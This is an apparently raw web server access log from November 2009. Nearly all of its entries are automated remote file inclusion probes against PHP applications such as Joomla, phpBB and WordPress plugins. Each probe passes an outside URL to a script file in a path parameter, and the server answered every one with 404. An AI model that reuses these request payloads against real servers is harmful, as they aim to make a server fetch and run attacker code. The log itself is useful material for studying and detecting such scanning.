77.221.130.17 - - [09/Nov/2009:02:39:55 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [09/Nov/2009:02:39:55 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [09/Nov/2009:02:40:02 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [09/Nov/2009:02:40:02 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [09/Nov/2009:02:40:02 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
67.195.115.176 - - [09/Nov/2009:02:41:19 -0800] "GET /logs/access_081208.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:02:41:44 -0800] "GET /logs/access_090608.log%20//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:02:42:29 -0800] "GET /logs/access_090608.log%20//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
88.131.106.16 - - [09/Nov/2009:02:43:08 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [09/Nov/2009:02:43:11 -0800] "GET / HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
216.75.32.231 - - [09/Nov/2009:02:43:14 -0800] "GET /logs/access_090831.log/index2.php?x=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.75.32.231 - - [09/Nov/2009:02:43:14 -0800] "GET /logs/index2.php?x=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:02:43:39 -0800] "GET /logs/access_090608.log%20//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.234.2.90 - - [09/Nov/2009:02:48:31 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
222.234.2.90 - - [09/Nov/2009:02:48:32 -0800] "GET /logs/access_091012.log/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
222.234.2.90 - - [09/Nov/2009:02:48:32 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
222.234.2.90 - - [09/Nov/2009:02:49:24 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "galf.org"
222.234.2.90 - - [09/Nov/2009:02:49:24 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "galf.org"
222.234.2.90 - - [09/Nov/2009:02:49:24 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "galf.org"
66.229.252.11 - - [09/Nov/2009:02:49:52 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:49:52 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:49:55 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:49:57 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:49:57 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:00 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:24 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:24 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:24 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [09/Nov/2009:02:50:31 -0800] "GET /logs/mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [09/Nov/2009:02:50:32 -0800] "GET /mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [09/Nov/2009:02:50:32 -0800] "GET /logs/access_090601.log/mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:32 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:32 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:32 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:35 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:36 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:50:53 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:51:06 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:51:36 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:51:36 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:51:36 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [09/Nov/2009:02:51:44 -0800] "GET /logs/access_090817.log/mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:53:42 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:53:42 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:02:53:42 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:02:54:10 -0800] "GET /logs/access_091012.log%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:02:54:10 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:02:54:10 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.254.134.50 - - [09/Nov/2009:02:55:22 -0800] "GET /logs/error.php?dir=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
195.254.134.50 - - [09/Nov/2009:02:55:22 -0800] "GET /error.php?dir=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:02:55:43 -0800] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:02:55:43 -0800] "GET /logs/access_090622.log//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:02:55:43 -0800] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:02:55:56 -0800] "GET /logs/access_090309.log//include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:02:56:02 -0800] "GET /logs/access.log//include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [09/Nov/2009:02:56:10 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.csps.ptc.edu.tw/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:02:56:10 -0800] "GET /index.php?redir=http://www.csps.ptc.edu.tw/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:02:56:10 -0800] "GET /logs/index.php?redir=http://www.csps.ptc.edu.tw/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:02:56:15 -0800] "GET /logs/access_090406.log%20%20/index.php?redir=http://www.csps.ptc.edu.tw/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:02:56:28 -0800] "GET /index.php?redir=http://www.csps.ptc.edu.tw/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:02:56:28 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.csps.ptc.edu.tw/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:02:56:28 -0800] "GET /logs/index.php?redir=http://www.csps.ptc.edu.tw/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:02:56:33 -0800] "GET /logs/access_090406.log%20%20/index.php?redir=http://www.csps.ptc.edu.tw/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [09/Nov/2009:02:57:03 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.13.191.76 - - [09/Nov/2009:02:58:18 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:02:59:49 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
202.117.58.254 - - [09/Nov/2009:02:59:49 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
121.78.88.226 - - [09/Nov/2009:03:00:04 -0800] "GET /logs/access_090525.log/mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:00:12 -0800] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:00:12 -0800] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:00:12 -0800] "GET /logs/access_090622.log//content/multithumb/multithumb.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [09/Nov/2009:03:00:27 -0800] "GET /logs/access_090504.log/mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [09/Nov/2009:03:00:37 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [09/Nov/2009:03:00:37 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [09/Nov/2009:03:00:37 -0800] "GET /logs/access_091012.log%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [09/Nov/2009:03:02:33 -0800] "GET /logs/access_090330.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [09/Nov/2009:03:02:33 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [09/Nov/2009:03:02:33 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [09/Nov/2009:03:02:53 -0800] "GET /logs/access_090907.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:02:55 -0800] "GET /logs/access_090330.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dom-fem.com/1/su/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:02:57 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dom-fem.com/1/su/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:02:57 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dom-fem.com/1/su/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:03:24 -0800] "GET /logs/access_090907.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dom-fem.com/1/su/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [09/Nov/2009:03:05:12 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:08:29 -0800] "GET /error.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:08:31 -0800] "GET /logs/access_090504.log%20%20/error.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:08:31 -0800] "GET /logs/error.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:08:43 -0800] "GET /logs/access_090330.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dom-fem.com/1/su/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:03:08:47 -0800] "GET /logs/access_090907.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dom-fem.com/1/su/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:09:03 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
202.117.58.254 - - [09/Nov/2009:03:09:06 -0800] "GET /error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:11:24 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:11:24 -0800] "GET /logs/access_090330.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:11:24 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:11:26 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:11:27 -0800] "GET /logs/access_090330.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:11:27 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.40.86.142 - - [09/Nov/2009:03:12:56 -0800] "GET /logs/access_090504.log/error.php?dir=http://jack.tiscali.it/hitech/dvd/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
200.40.86.142 - - [09/Nov/2009:03:12:56 -0800] "GET /error.php?dir=http://jack.tiscali.it/hitech/dvd/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
200.40.86.142 - - [09/Nov/2009:03:12:56 -0800] "GET /logs/error.php?dir=http://jack.tiscali.it/hitech/dvd/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:13:08 -0800] "GET /logs/access_090907.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:03:13:10 -0800] "GET /logs//includes/functions.php?phpbb_root_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:03:13:10 -0800] "GET /logs/access_090413.log//includes/functions.php?phpbb_root_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:03:13:13 -0800] "GET /includes/functions.php?phpbb_root_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:13:13 -0800] "GET /logs/access_090907.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:13:26 -0800] "GET /logs/access_090914.log%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:13:26 -0800] "GET /logs/access_090504.log%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.40.86.142 - - [09/Nov/2009:03:13:58 -0800] "GET /logs/access_090518.log/error.php?dir=http://jack.tiscali.it/hitech/dvd/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
195.13.191.76 - - [09/Nov/2009:03:14:18 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:14:33 -0800] "GET /logs/access_090504.log/error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:14:34 -0800] "GET /error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:14:35 -0800] "GET /logs/error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
91.192.20.164 - - [09/Nov/2009:03:15:00 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [09/Nov/2009:03:15:00 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [09/Nov/2009:03:15:01 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:15:21 -0800] "GET /logs/access_090914.log%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
